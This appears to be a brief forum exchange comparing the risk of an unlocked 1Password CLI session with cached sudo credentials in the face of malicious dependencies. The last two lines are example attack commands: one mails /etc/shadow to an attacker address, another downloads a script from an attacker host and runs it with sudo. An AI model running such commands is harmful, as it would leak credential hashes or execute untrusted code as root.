Low-risk in terms of what? They’re superficially similar only in that both cache authentication for convenience. But the consequences are totally different. Sudo caches auth to let you run privileged commands locally; it doesn’t hand secrets to other processes. An unlocked 1Password CLI session can be abused by any code that can call the CLI (or read its session token) to export and ship vault contents, that’s an exfiltration vector, not just local privilege reuse. I’d rate that much higher risk personally.
the chance the dependency you've just updated and your vault being unlocked at the same exact time, if someone is attacked by a malicious dependency you have bigger problems to worry about.
sudo cat /etc/shadow | mail attacker@gmail.com
or wget https://attacker.com/install_special_pam_bypass.sh | sudo install_special_pam_bypass.sh